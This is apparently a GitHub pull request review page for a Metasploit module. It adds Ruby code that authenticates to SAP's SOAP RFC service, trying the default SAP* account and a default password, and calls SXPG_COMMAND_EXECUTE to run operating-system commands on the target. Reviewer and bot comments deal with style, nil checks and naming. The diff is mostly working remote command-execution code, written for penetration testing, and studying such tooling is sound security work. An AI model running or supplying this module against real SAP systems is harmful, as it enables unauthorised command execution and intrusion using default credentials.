
SAP SOAP RFC DBMCLI Command Injection (via SXPG_CALL_SYSTEM) #1030

Merged
merged 7 commits into from over 1 year ago

3 participants

nmonkee Juan Vazquez Brandon Perry
nmonkee

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands via DBMCLI command as configured in SM69. See http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection for more information.

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((30 lines not shown))
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
  33
+				},
  34
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
  35
+			'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
  36
+			'License' => BSD_LICENSE
  37
+			)
  38
+		register_options(
  39
+			[
  40
+				OptString.new('CLIENT', [true, 'Client', nil]),
  41
+				OptString.new('USER', [true, 'Username', nil]),
  42
+				OptString.new('PASS', [true, 'Password', nil]),
  43
+				OptString.new('CMD', [true, 'Command to be executed', nil]),
  44
+				OptString.new('PARAM', [false, 'Additional parameters', nil]),
  45
+				OptString.new('OS', [true, '1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', nil]),
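Review bot: The credential options at lines 41-42 are named USER and PASS, while framework modules conventionally use USERNAME and PASSWORD, so values an operator has already set under the conventional names are not picked up by this module. Rename both options and update the lookups that read them.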
3

Trailing comma

Juan Vazquez Collaborator

If OS commands can be executed maybe it can be converted into an exploit

Juan Vazquez Collaborator

I think you should use OptEnum for the OS option

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((79 lines not shown))
  79
+	data << '</n1:SXPG_COMMAND_EXECUTE>'
  80
+	data << '</env:Body>'
  81
+	data << '</env:Envelope>'
  82
+	user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
  83
+	print_status("#{ip}:#{datastore['RPORT']} - sending SOAP SXPG_COMMAND_EXECUTE request")
  84
+	begin
  85
+		res = send_request_raw({
  86
+			'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  87
+			'method' => 'POST',
  88
+			'data' => data,
  89
+			'headers' =>{
  90
+				'Content-Length' => data.size.to_s,
  91
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  92
+				'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  93
+				'Authorization' => 'Basic ' + user_pass,
  94
+				'Content-Type' => 'text/xml; charset=UTF-8',
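Review bot: 'Content-Length' at line 90 is computed with data.size, which on Ruby 1.9 and later counts characters rather than bytes, so a body containing multi-byte characters (the request declares charset=UTF-8 at line 94) is sent with a length shorter than its actual size. Use data.bytesize, or drop the explicit header if the HTTP client already sets it.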
1

Trailing comma

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((82 lines not shown))
  82
+	user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
  83
+	print_status("#{ip}:#{datastore['RPORT']} - sending SOAP SXPG_COMMAND_EXECUTE request")
  84
+	begin
  85
+		res = send_request_raw({
  86
+			'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  87
+			'method' => 'POST',
  88
+			'data' => data,
  89
+			'headers' =>{
  90
+				'Content-Length' => data.size.to_s,
  91
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  92
+				'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  93
+				'Authorization' => 'Basic ' + user_pass,
  94
+				'Content-Type' => 'text/xml; charset=UTF-8',
  95
+				}
  96
+			}, 45)
  97
+		if (res.code != 500 and res.code != 200)
1

if res.code != 500 and res.code != 200

you are also not checking if res is null before evaluating res.code

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((95 lines not shown))
  95
+				}
  96
+			}, 45)
  97
+		if (res.code != 500 and res.code != 200)
  98
+			# to do - implement error handlers for each status code, 404, 301, etc.
  99
+			print_error("#{ip}:#{datastore['RPORT']} - something went wrong!")
  100
+			return
  101
+		else
  102
+			success = true
  103
+			print_status("#{ip}:#{datastore['RPORT']} - got response")
  104
+			saptbl = Msf::Ui::Console::Table.new(
  105
+				Msf::Ui::Console::Table::Style::Default,
  106
+					'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  107
+					'Prefix' => "\n",
  108
+					'Postfix' => "\n",
  109
+					'Indent'  => 1,
  110
+					'Columns' =>["Output",]
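Review bot: The error path at line 99 prints only "something went wrong!" and discards res.code, so the 404 and 301 cases named in the to-do at line 98 look identical to the operator. Include the status code in the message until the per-status handlers exist.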
1

Trailing comma in array?

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((100 lines not shown))
  100
+			return
  101
+		else
  102
+			success = true
  103
+			print_status("#{ip}:#{datastore['RPORT']} - got response")
  104
+			saptbl = Msf::Ui::Console::Table.new(
  105
+				Msf::Ui::Console::Table::Style::Default,
  106
+					'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  107
+					'Prefix' => "\n",
  108
+					'Postfix' => "\n",
  109
+					'Indent'  => 1,
  110
+					'Columns' =>["Output",]
  111
+					)
  112
+			response = res.body
  113
+			if response =~ /faultstring/
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
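Review bot: The faultstring pattern at line 114 uses (.*?) without the multiline flag, so a fault message that spans more than one line is not captured and error comes back empty even though the check at line 113 matched. Add the m flag to the pattern, or match on a character class that excludes the opening angle bracket.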
1

typo

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((103 lines not shown))
  103
+			print_status("#{ip}:#{datastore['RPORT']} - got response")
  104
+			saptbl = Msf::Ui::Console::Table.new(
  105
+				Msf::Ui::Console::Table::Style::Default,
  106
+					'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  107
+					'Prefix' => "\n",
  108
+					'Postfix' => "\n",
  109
+					'Indent'  => 1,
  110
+					'Columns' =>["Output",]
  111
+					)
  112
+			response = res.body
  113
+			if response =~ /faultstring/
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
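Review bot: The MESSAGE pattern at line 117 returns the raw element text, so output containing angle brackets or ampersands reaches saptbl still entity-encoded, and empty MESSAGE elements are dropped because of the + quantifier. Decode the entities before adding rows, or parse the body with an XML parser instead of a regular expression.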
1

0.upto(output.length-1) do |i|

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((111 lines not shown))
  111
+					)
  112
+			response = res.body
  113
+			if response =~ /faultstring/
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
  119
+				saptbl << [output[i]]
  120
+			end
  121
+		end
  122
+		rescue ::Rex::ConnectionError
  123
+			print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
  124
+			return
  125
+		end
  126
+		if success == true
1

if success

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((114 lines not shown))
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
  119
+				saptbl << [output[i]]
  120
+			end
  121
+		end
  122
+		rescue ::Rex::ConnectionError
  123
+			print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
  124
+			return
  125
+		end
  126
+		if success == true
  127
+			print(saptbl.to_s)
  128
+		end
  129
+		if sucess == false
1

typo

also, if not success

or

if !success

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((115 lines not shown))
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
  119
+				saptbl << [output[i]]
  120
+			end
  121
+		end
  122
+		rescue ::Rex::ConnectionError
  123
+			print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
  124
+			return
  125
+		end
  126
+		if success == true
  127
+			print(saptbl.to_s)
  128
+		end
  129
+		if sucess == false
  130
+			for i in 0..error.length-1
1

0.upto(error.length-1) do |i|

Juan Vazquez
Collaborator

msftidy warning should be fixed

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
sap_soap_rfc_sxpg_command_exec.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_command_exec.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:48 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:135 - [WARNING] Spaces at EOL

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((14 lines not shown))
  14
+# experience - a very cool guy. I'd also like to thank Chris John Riley, 
  15
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and 
  16
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
1
Juan Vazquez Collaborator

A little more descriptive name pls

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((15 lines not shown))
  15
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and 
  16
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
1
Juan Vazquez Collaborator

version isn't needed anymore

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((19 lines not shown))
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
  33
+				},
  34
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
1
Juan Vazquez Collaborator

no general references pls

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((21 lines not shown))
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
  33
+				},
  34
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
  35
+			'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
  36
+			'License' => BSD_LICENSE
1
Juan Vazquez Collaborator

Can MSF_LICENSE be used?

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((17 lines not shown))
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
1
Juan Vazquez Collaborator

No more than 100 columns per line in the description pls

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((86 lines not shown))
  86
+			'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  87
+			'method' => 'POST',
  88
+			'data' => data,
  89
+			'headers' =>{
  90
+				'Content-Length' => data.size.to_s,
  91
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  92
+				'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  93
+				'Authorization' => 'Basic ' + user_pass,
  94
+				'Content-Type' => 'text/xml; charset=UTF-8',
  95
+				}
  96
+			}, 45)
  97
+		if (res.code != 500 and res.code != 200)
  98
+			# to do - implement error handlers for each status code, 404, 301, etc.
  99
+			print_error("#{ip}:#{datastore['RPORT']} - something went wrong!")
  100
+			return
  101
+		else
1
Juan Vazquez Collaborator

sure res couldn't be nil here?

Juan Vazquez
Collaborator

This pull request includes the file modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb, isn't it the same as #1037?

Juan Vazquez
Collaborator

ap haha sorry, can you just delete it (the wrong file) from this branch (sap_soap_rfc_dbmcli_sxpg_call_system_command_exec)?

nmonkee

done

and others added some commits November 19, 2012
Juan Vazquez jvazquez-r7 referenced this pull request from a commit November 20, 2012
up to date to test rapid7#1030 5f99b56
Juan Vazquez jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework November 20, 2012
Merged

up to date to test rapid7#1030 #3

Juan Vazquez
Collaborator

Awesome! looks good, merging! thanks for updating the author, sorry, my fault!

Juan Vazquez jvazquez-r7 merged commit e16a51f into from November 20, 2012
Juan Vazquez jvazquez-r7 closed this November 20, 2012
BIN  modules/auxiliary/scanner/sap/sap.linux.pcap
Binary file not shown
1  modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -38,7 +38,6 @@ def initialize
38 38
 				],
39 39
 			'Author' =>
40 40
 				[
41  
-					'Agnivesh Sathasivam',
42 41
 					'nmonkee'
43 42
 				],
44 43
 			'License' => MSF_LICENSE
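Review bot: The 'Agnivesh Sathasivam' entry removed at line 41 is still listed under 'Author' in sap_soap_rfc_sxpg_command_exec.rb as added in this same diff, and nothing in the change records why the attribution differs between the two modules. State the reason in the commit message so the difference reads as deliberate rather than as an incomplete edit.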
125  modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
... ...
@@ -0,0 +1,125 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# Framework web site for more information on licensing and terms of use.
  5
+# http://metasploit.com/framework/
  6
+##
  7
+
  8
+##
  9
+# This module is based on, inspired by, or is a port of a plugin available in
  10
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
  11
+# http://www.onapsis.com/research-free-solutions.php.
  12
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
  13
+# in producing the Metasploit modules and was happy to share his knowledge and
  14
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
  15
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
  16
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Description' => %q{
  31
+					This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through
  32
+				the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured
  33
+				in the SM69 transaction.
  34
+				},
  35
+			'References' =>
  36
+				[
  37
+					[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
  38
+				],
  39
+			'Author' =>
  40
+				[
  41
+					'Agnivesh Sathasivam',
  42
+					'nmonkee'
  43
+				],
  44
+			'License' => MSF_LICENSE
  45
+		)
  46
+		register_options(
  47
+			[
  48
+				Opt::RPORT(8000),
  49
+				OptString.new('CLIENT', [true, 'SAP Client', '001']),
  50
+				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
  51
+				OptString.new('PASSWORD', [true, 'Password', '06071992']),
  52
+				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
  53
+				OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
  54
+				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
  55
+			], self.class)
  56
+	end
  57
+
  58
+	def run_host(ip)
  59
+		os = datastore['OS']
  60
+		data = '<?xml version="1.0" encoding="utf-8" ?>'
  61
+		data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
  62
+		data << '<env:Body>'
  63
+		data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
  64
+		if datastore['PARAM']
  65
+			data << '<ADDITIONAL_PARAMETERS>' + datastore['PARAM'] + ' </ADDITIONAL_PARAMETERS>'
  66
+		else
  67
+			data << '<ADDITIONAL_PARAMETERS> </ADDITIONAL_PARAMETERS>'
  68
+		end
  69
+		data << '<COMMANDNAME>' + datastore['CMD'] + '</COMMANDNAME>'
  70
+		data << '<OPERATINGSYSTEM>' + os + '</OPERATINGSYSTEM>'
  71
+		data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>'
  72
+		data << '</n1:SXPG_COMMAND_EXECUTE>'
  73
+		data << '</env:Body>'
  74
+		data << '</env:Envelope>'
  75
+		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
  76
+		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
  77
+		begin
  78
+			res = send_request_raw({
  79
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  80
+				'method' => 'POST',
  81
+				'data' => data,
  82
+				'headers' =>{
  83
+					'Content-Length' => data.size.to_s,
  84
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  85
+					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  86
+					'Authorization' => 'Basic ' + user_pass,
  87
+					'Content-Type' => 'text/xml; charset=UTF-8'
  88
+					}
  89
+				}, 45)
  90
+			if res and res.code != 500 and res.code != 200
  91
+				# to do - implement error handlers for each status code, 404, 301, etc.
  92
+				print_error("[SAP] #{ip}:#{rport} - something went wrong!")
  93
+				return
  94
+			elsif res and res.body =~ /faultstring/
  95
+				error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  96
+				0.upto(error.length-1) do |i|
  97
+					print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
  98
+				end
  99
+				return
  100
+			elsif res
  101
+				print_status("[SAP] #{ip}:#{rport} - got response")
  102
+				saptbl = Msf::Ui::Console::Table.new(
  103
+					Msf::Ui::Console::Table::Style::Default,
  104
+						'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  105
+						'Prefix' => "\n",
  106
+						'Postfix' => "\n",
  107
+						'Indent'  => 1,
  108
+						'Columns' =>["Output",]
  109
+						)
  110
+				output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  111
+				for i in 0..output.length-1
  112
+					saptbl << [output[i]]
  113
+				end
  114
+				print(saptbl.to_s)
  115
+				return
  116
+			else
  117
+				print_error("[SAP] #{ip}:#{rport} - Unknown error")
  118
+				return
  119
+			end
  120
+		rescue ::Rex::ConnectionError
  121
+			print_error("[SAP] #{ip}:#{rport} - Unable to connect")
  122
+			return
  123
+		end
  124
+	end
  125
+end
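Review bot: Two points from the earlier review are still present in this version: the trailing comma in 'Columns' at line 108 and the for loop at line 111, even though the fault branch at line 96 already uses 0.upto. Apply the same fixes there. In addition, Msf::Auxiliary::Report is included at line 24 but run_host never reports anything, so either drop the mixin or record the result; and when send_request_raw returns nil the else branch at line 117 prints "Unknown error", where a message saying that no response was received would be more useful to the operator.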